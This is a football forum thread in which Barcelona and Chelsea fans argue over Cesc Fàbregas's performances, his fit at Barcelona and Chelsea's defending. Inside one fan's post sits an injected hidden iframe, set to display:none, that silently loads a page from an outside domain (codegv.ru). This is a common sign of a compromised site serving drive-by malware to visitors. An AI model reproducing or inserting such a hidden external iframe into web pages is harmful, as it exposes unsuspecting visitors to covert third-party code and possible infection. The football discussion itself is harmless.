Cesc Fàbregas

R

Ryu Hayabusa

Was dispossessed for the Schalke goal, other than that played well enough. Got his first goal, but really should have had 2.

Clearly you are wrong in that assessment as his actual goal would have never happened, if the match were lead by an actual referee worthy of that job title.

antonnn

Blue Blooded Aussie
I thought I had put that there, must have said in the chat instead. The first goal being disallowed would have changed how the match went, who knows, Schalke may have won, or maybe Cesc would have gone on to score 2. Anyway, as it stands, he really should have put the game to bed before the end of the first half, overall it was a fail performance on the part of all our attackers. Remy should have started instead of Drogba too IMO.

Barcilliant

Never liked Cesc and now he's at Chelsea I dislike him more. He is suited to that EPL style of football where he feeds the number 9 in front of him. At Barca he didn't have the intelligence or technique to adapt.

barcaboy15

Yeah, damn him for not adapting to playing 7 different position a season.

I keep seeing this comment, mainly from Chelsea fans, and it's such rubbish...

Fabregas was played in a few different positions but that's because he was just so bad and ill-suited to playing CM for Barca.

pacp_96

Chief Of Footballing Matters
Yeah, damn him for not adapting to playing 7 different position a season.

Rubbish. He was moved around because he wasn't suited to any position we had in our team. Now he's in a position that suits him, in a team that suits him and in a league that suits him.

antonnn

Blue Blooded Aussie
The way I see it both parties are at fault for the failure. I don't think he's not suited for La Liga tbh, it just didn't work at Barca more than anything. He's probably suit Real better lol.

F

Flavia

The way I see it both parties are at fault for the failure. I don't think he's not suited for La Liga tbh, it just didn't work at Barca more than anything. He's probably suit Real better lol.

He couldn't defend properly, always chasing the ball, and was slow during his tenure here. Just watching Rakitic it gets evident why Cesc didn't fit. His best position is at 10, with no much defense duties, and a 9 in front.
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Stric

Rubbish. He was moved around because he wasn't suited to any position we had in our team. Now he's in a position that suits him, in a team that suits him and in a league that suits him.

He was moved around because he was filling in for whoever was injured or rested in that particular game. And because he was versatile enough to do a decent job in all those positions. He was 2nd choice for all of Xavi, Iniesta and Messi in their positions. The coaches didn't play him in different positions just because they wanted to see how he does in each one. We never had that luxury.

Ursegor

World Champion
Chelsea under Mourinho used to be known for defensive solidity. Since Cesc joined 7 goals conceded already. Meanwhile Barca yet to concede the first goal of the season. Coincidence? I think not. :bartomeu:

Alik

Chelsea under Mourinho used to be known for defensive solidity. Since Cesc joined 7 goals conceded already. Meanwhile Barca yet to concede the first goal of the season. Coincidence? I think not. :bartomeu:

On the other hand, Chelsea are scoring more than ever whilst we aren't scoring as much. *shrugs

Home of Barca Fans